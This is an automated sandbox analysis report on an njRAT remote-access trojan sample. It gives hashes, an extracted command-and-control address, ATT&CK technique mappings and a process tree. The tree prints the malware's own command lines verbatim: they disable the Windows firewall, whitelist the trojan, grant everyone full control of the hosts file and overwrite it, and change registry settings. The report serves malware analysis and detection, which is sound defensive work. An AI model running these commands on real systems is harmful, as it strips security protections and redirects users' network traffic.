njrat | 6b6c079401e47ab7c10a16fec31f9e330b3730f0e9f925caa43368b95a421b5e

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10-en-20211208
submitted
22-12-2021 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b28f74c18bf85bea722d915ee65f5f1c.exe
Size

7.2MB
MD5

b28f74c18bf85bea722d915ee65f5f1c
SHA1

fff14f1641964aa645eb79d8e85786b6bbc42664
SHA256

6b6c079401e47ab7c10a16fec31f9e330b3730f0e9f925caa43368b95a421b5e
SHA512

3b1eaa9ed38fd4498d92b66f048509be96376bbd1384c3bfa2471786ff395a95c87b64d6b6e730c91a56ac1afd1ba76bba01d4f30470e426f972e702be881825

Score

10^/10

njrat user evasion persistence trojan upx

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

user

6.tcp.ngrok.io:18635

Mutex

f1772f647278bebfd846fd1a1dc56683

Attributes

reg_key
f1772f647278bebfd846fd1a1dc56683
splitter
Y262SUCZ4UJJ

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

Processes:

TKEBSCCC.dllcmd.execmd.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\comctl.sys	TKEBSCCC.dll
File created	C:\Windows\system32\drivers\etc\hosts.ics	cmd.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 14 IoCs

Processes:

Client.exeCG_Loader.exeTKEBSCCC.dllTKEBSCCC.dllTKEBSCCC.exeTKEBSCCC.dllcmd.exeTKEBSCCC.dllTKEBSCCC.dllTKEBSCCC.dllTKEBSCCC.dllcmd.execacls.exetaskwinuee.exe

pid	process
1244	Client.exe
3392	CG_Loader.exe
2132	TKEBSCCC.dll
2432	TKEBSCCC.dll
3172	TKEBSCCC.exe
2508	TKEBSCCC.dll
2836	cmd.exe
1048	TKEBSCCC.dll
2072	TKEBSCCC.dll
1844	TKEBSCCC.dll
1520	TKEBSCCC.dll
2292	cmd.exe
2432	cacls.exe
3984	taskwinuee.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx
C:\Windows\TKEBSCCC.dll	upx

Loads dropped DLL 64 IoCs

Processes:

CG_Loader.exetaskwinuee.exe

pid	process
3392	CG_Loader.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe

Drops file in Windows directory 1 IoCs

Processes:

CG_Loader.exe

description ioc process

File created C:\Windows\TKEBSCCC.dll CG_Loader.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3008 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1320 ipconfig.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2508 taskkill.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

taskwinuee.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections taskwinuee.exe

description	ioc	process
File created	C:\Windows\TKEBSCCC.dll	CG_Loader.exe

pid	process
3008	timeout.exe

pid	process
1320	ipconfig.exe

pid	process
2508	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	taskwinuee.exe

Modifies registry class 9 IoCs

Processes:

TKEBSCCC.dllTKEBSCCC.dllTKEBSCCC.dllcacls.exeTKEBSCCC.dllTKEBSCCC.dllcmd.exeTKEBSCCC.dll

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	TKEBSCCC.dll
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	TKEBSCCC.dll
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	TKEBSCCC.dll
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	cacls.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	TKEBSCCC.dll
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	TKEBSCCC.dll
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	TKEBSCCC.dll
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\2396220e	cacls.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

CG_Loader.exeTKEBSCCC.dllTKEBSCCC.exetaskwinuee.exe

pid	process
3392	CG_Loader.exe
2432	TKEBSCCC.dll
2432	TKEBSCCC.dll
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3172	TKEBSCCC.exe
3172	TKEBSCCC.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3984	taskwinuee.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe
3392	CG_Loader.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

CG_Loader.exe

pid process

3392 CG_Loader.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

TKEBSCCC.dll

pid process

632
2508 TKEBSCCC.dll

pid	process
632
2508	TKEBSCCC.dll

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

CG_Loader.exeTKEBSCCC.dllTKEBSCCC.dllTKEBSCCC.dll

description	pid	process
Token: SeDebugPrivilege	3392	CG_Loader.exe
Token: SeIncreaseQuotaPrivilege	2132	TKEBSCCC.dll
Token: SeSecurityPrivilege	2132	TKEBSCCC.dll
Token: SeTakeOwnershipPrivilege	2132	TKEBSCCC.dll
Token: SeLoadDriverPrivilege	2132	TKEBSCCC.dll
Token: SeSystemProfilePrivilege	2132	TKEBSCCC.dll
Token: SeSystemtimePrivilege	2132	TKEBSCCC.dll
Token: SeProfSingleProcessPrivilege	2132	TKEBSCCC.dll
Token: SeIncBasePriorityPrivilege	2132	TKEBSCCC.dll
Token: SeCreatePagefilePrivilege	2132	TKEBSCCC.dll
Token: SeBackupPrivilege	2132	TKEBSCCC.dll
Token: SeRestorePrivilege	2132	TKEBSCCC.dll
Token: SeShutdownPrivilege	2132	TKEBSCCC.dll
Token: SeDebugPrivilege	2132	TKEBSCCC.dll
Token: SeSystemEnvironmentPrivilege	2132	TKEBSCCC.dll
Token: SeChangeNotifyPrivilege	2132	TKEBSCCC.dll
Token: SeRemoteShutdownPrivilege	2132	TKEBSCCC.dll
Token: SeUndockPrivilege	2132	TKEBSCCC.dll
Token: SeManageVolumePrivilege	2132	TKEBSCCC.dll
Token: SeImpersonatePrivilege	2132	TKEBSCCC.dll
Token: SeCreateGlobalPrivilege	2132	TKEBSCCC.dll
Token: 33	2132	TKEBSCCC.dll
Token: 34	2132	TKEBSCCC.dll
Token: 35	2132	TKEBSCCC.dll
Token: 36	2132	TKEBSCCC.dll
Token: SeIncreaseQuotaPrivilege	2432	TKEBSCCC.dll
Token: SeSecurityPrivilege	2432	TKEBSCCC.dll
Token: SeTakeOwnershipPrivilege	2432	TKEBSCCC.dll
Token: SeLoadDriverPrivilege	2432	TKEBSCCC.dll
Token: SeSystemProfilePrivilege	2432	TKEBSCCC.dll
Token: SeSystemtimePrivilege	2432	TKEBSCCC.dll
Token: SeProfSingleProcessPrivilege	2432	TKEBSCCC.dll
Token: SeIncBasePriorityPrivilege	2432	TKEBSCCC.dll
Token: SeCreatePagefilePrivilege	2432	TKEBSCCC.dll
Token: SeBackupPrivilege	2432	TKEBSCCC.dll
Token: SeRestorePrivilege	2432	TKEBSCCC.dll
Token: SeShutdownPrivilege	2432	TKEBSCCC.dll
Token: SeDebugPrivilege	2432	TKEBSCCC.dll
Token: SeSystemEnvironmentPrivilege	2432	TKEBSCCC.dll
Token: SeChangeNotifyPrivilege	2432	TKEBSCCC.dll
Token: SeRemoteShutdownPrivilege	2432	TKEBSCCC.dll
Token: SeUndockPrivilege	2432	TKEBSCCC.dll
Token: SeManageVolumePrivilege	2432	TKEBSCCC.dll
Token: SeImpersonatePrivilege	2432	TKEBSCCC.dll
Token: SeCreateGlobalPrivilege	2432	TKEBSCCC.dll
Token: 33	2432	TKEBSCCC.dll
Token: 34	2432	TKEBSCCC.dll
Token: 35	2432	TKEBSCCC.dll
Token: 36	2432	TKEBSCCC.dll
Token: SeIncreaseQuotaPrivilege	2508	TKEBSCCC.dll
Token: SeSecurityPrivilege	2508	TKEBSCCC.dll
Token: SeTakeOwnershipPrivilege	2508	TKEBSCCC.dll
Token: SeLoadDriverPrivilege	2508	TKEBSCCC.dll
Token: SeSystemProfilePrivilege	2508	TKEBSCCC.dll
Token: SeSystemtimePrivilege	2508	TKEBSCCC.dll
Token: SeProfSingleProcessPrivilege	2508	TKEBSCCC.dll
Token: SeIncBasePriorityPrivilege	2508	TKEBSCCC.dll
Token: SeCreatePagefilePrivilege	2508	TKEBSCCC.dll
Token: SeBackupPrivilege	2508	TKEBSCCC.dll
Token: SeRestorePrivilege	2508	TKEBSCCC.dll
Token: SeShutdownPrivilege	2508	TKEBSCCC.dll
Token: SeDebugPrivilege	2508	TKEBSCCC.dll
Token: SeSystemEnvironmentPrivilege	2508	TKEBSCCC.dll
Token: SeChangeNotifyPrivilege	2508	TKEBSCCC.dll

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

TKEBSCCC.dll

pid process

2432 TKEBSCCC.dll

pid	process
2432	TKEBSCCC.dll

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b28f74c18bf85bea722d915ee65f5f1c.exeClient.exeCG_Loader.execmd.execmd.exe

description	pid	process	target process
PID 2512 wrote to memory of 1244	2512	b28f74c18bf85bea722d915ee65f5f1c.exe	Client.exe
PID 2512 wrote to memory of 1244	2512	b28f74c18bf85bea722d915ee65f5f1c.exe	Client.exe
PID 2512 wrote to memory of 1244	2512	b28f74c18bf85bea722d915ee65f5f1c.exe	Client.exe
PID 2512 wrote to memory of 3392	2512	b28f74c18bf85bea722d915ee65f5f1c.exe	CG_Loader.exe
PID 2512 wrote to memory of 3392	2512	b28f74c18bf85bea722d915ee65f5f1c.exe	CG_Loader.exe
PID 2512 wrote to memory of 3392	2512	b28f74c18bf85bea722d915ee65f5f1c.exe	CG_Loader.exe
PID 1244 wrote to memory of 2824	1244	Client.exe	netsh.exe
PID 1244 wrote to memory of 2824	1244	Client.exe	netsh.exe
PID 1244 wrote to memory of 2824	1244	Client.exe	netsh.exe
PID 3392 wrote to memory of 1456	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 1456	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 1456	3392	CG_Loader.exe	cmd.exe
PID 1456 wrote to memory of 612	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 612	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 612	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 712	1456	cmd.exe	netsh.exe
PID 1456 wrote to memory of 712	1456	cmd.exe	netsh.exe
PID 1456 wrote to memory of 712	1456	cmd.exe	netsh.exe
PID 1456 wrote to memory of 2420	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2420	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2420	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2212	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 2212	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 2212	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 2548	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2548	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2548	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2960	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 2960	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 2960	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 2340	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2340	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2340	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2380	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2380	1456	cmd.exe	cmd.exe
PID 1456 wrote to memory of 2380	1456	cmd.exe	cmd.exe
PID 3392 wrote to memory of 1556	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 1556	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 1556	3392	CG_Loader.exe	cmd.exe
PID 1556 wrote to memory of 3952	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 3952	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 3952	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 2132	1556	cmd.exe	TKEBSCCC.dll
PID 1556 wrote to memory of 2132	1556	cmd.exe	TKEBSCCC.dll
PID 1556 wrote to memory of 2132	1556	cmd.exe	TKEBSCCC.dll
PID 1556 wrote to memory of 2520	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 2520	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 2520	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 2432	1556	cmd.exe	TKEBSCCC.dll
PID 1556 wrote to memory of 2432	1556	cmd.exe	TKEBSCCC.dll
PID 1556 wrote to memory of 2432	1556	cmd.exe	TKEBSCCC.dll
PID 1556 wrote to memory of 3048	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 3048	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 3048	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 3548	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 3548	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 3548	1556	cmd.exe	cacls.exe
PID 3392 wrote to memory of 3612	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 3612	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 3612	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 3172	3392	CG_Loader.exe	TKEBSCCC.exe
PID 3392 wrote to memory of 3172	3392	CG_Loader.exe	TKEBSCCC.exe
PID 3392 wrote to memory of 1912	3392	CG_Loader.exe	cmd.exe
PID 3392 wrote to memory of 1912	3392	CG_Loader.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\b28f74c18bf85bea722d915ee65f5f1c.exe
"C:\Users\Admin\AppData\Local\Temp\b28f74c18bf85bea722d915ee65f5f1c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2512

C:\Users\Admin\AppData\Roaming\Client.exe
"C:\Users\Admin\AppData\Roaming\Client.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1244

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Client.exe" "Client.exe" ENABLE
3⤵
PID:2824

C:\Users\Admin\AppData\Roaming\CG_Loader.exe
"C:\Users\Admin\AppData\Roaming\CG_Loader.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo|NetSh Advfirewall Set allprofiles state off & echo|reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f & echo|reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f & echo|del C:\CG_Loader\*.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:612

C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall Set allprofiles state off
4⤵
PID:712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
4⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:2548

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
4⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del C:\CG_Loader\*.exe"
4⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo|C:\Windows\TKEBSCCC.dll /protection off & echo|C:\Windows\TKEBSCCC.dll /op:uninstall_app & echo y|cacls "%windir%\system32\drivers\etc\hosts" /P %username% & echo y|cacls "%windir%\system32\drivers\etc\hosts.ics" /P %username%:f & echo y|cacls "%windir%\system32\drivers\etc\hosts" /P alla:f & echo y|cacls "%windir%\system32\drivers\etc\hosts.ics" /P alla:f & echo y|cacls "%windir%\system32\drivers\etc\hosts" /P everyone:f & echo y|cacls "%windir%\system32\drivers\etc\hosts.ics" /P everyone:f & echo y|cacls "C:\CG_Loader" /P alla:f & echo y|cacls "C:\CG_Loader" /P %username%:f & echo y|cacls "C:\CG_Loader" /P everyone:f & echo y|cacls "C:\CG_Loader\*.*" /P alla:f & echo y|cacls "C:\CG_Loader\*.*" /P %username%:f & echo y|cacls "C:\CG_Loader\*.*" /P everyone:f & echo y|cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.dll" /P %username%:f & echo y|cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.dll" /P alla:f & echo y|cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.dll" /P everyone:f & echo y|cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.sys" /P %username%:f & echo y|cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.sys" /P alla:f & echo y|cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.sys" /P everyone:f & echo y|cacls "C:\Windows\System32\drivers\etc" /P %username%:f & echo y|cacls "C:\Windows\System32\drivers\etc" /P alla:f & echo y|cacls "C:\Windows\System32\drivers\etc" /P everyone:f & echo y|cacls "%windir%\system32\drivers\etc" /P %username%:f & echo y|cacls "%windir%\system32\drivers\etc" /P alla:f & echo y|cacls "%windir%\system32\drivers\etc" /P everyone:f
3⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:3952

C:\Windows\TKEBSCCC.dll
C:\Windows\TKEBSCCC.dll /protection off
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:2520

C:\Windows\TKEBSCCC.dll
C:\Windows\TKEBSCCC.dll /op:uninstall_app
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3048

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc\hosts" /P Admin
4⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3804

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc\hosts.ics" /P Admin:f
4⤵
PID:3212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2620

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc\hosts" /P alla:f
4⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1292

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc\hosts.ics" /P alla:f
4⤵
PID:608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:884

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc\hosts" /P everyone:f
4⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:700

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc\hosts.ics" /P everyone:f
4⤵
PID:1152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:844

C:\Windows\SysWOW64\cacls.exe
cacls "C:\CG_Loader" /P alla:f
4⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3648

C:\Windows\SysWOW64\cacls.exe
cacls "C:\CG_Loader" /P Admin:f
4⤵
PID:3976

C:\Windows\SysWOW64\cacls.exe
cacls "C:\CG_Loader" /P everyone:f
4⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1052

C:\Windows\SysWOW64\cacls.exe
cacls "C:\CG_Loader\*.*" /P alla:f
4⤵
PID:1368

C:\Windows\SysWOW64\cacls.exe
cacls "C:\CG_Loader\*.*" /P Admin:f
4⤵
PID:1784

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.dll" /P Admin:f
4⤵
PID:704

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.dll" /P alla:f
4⤵
PID:3684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3724

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.dll" /P everyone:f
4⤵
PID:3060

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.sys" /P Admin:f
4⤵
- Executes dropped EXE
- Modifies registry class
PID:2432

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.sys" /P alla:f
4⤵
PID:3048

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Roaming\IObitUnlocker.sys" /P everyone:f
4⤵
PID:3804

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\System32\drivers\etc" /P Admin:f
4⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3212

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\System32\drivers\etc" /P alla:f
4⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:596

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\System32\drivers\etc" /P everyone:f
4⤵
PID:4004

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc" /P Admin:f
4⤵
PID:3596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:664

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc" /P alla:f
4⤵
PID:884

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\drivers\etc" /P everyone:f
4⤵
PID:700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
- Executes dropped EXE
- Modifies registry class
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3884

C:\Windows\SysWOW64\cacls.exe
cacls "C:\CG_Loader\*.*" /P everyone:f
4⤵
PID:3312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo|type "%appdata%\TKEBSCCC.txt" > "%windir%\system32\drivers\etc\hosts.ics" & echo|type "%appdata%\TKEBSCCC.txt" > "%windir%\system32\drivers\etc\hosts" & echo|ipconfig /flushdns
3⤵
PID:3612

C:\Windows\SysWOW64\cmd.exe
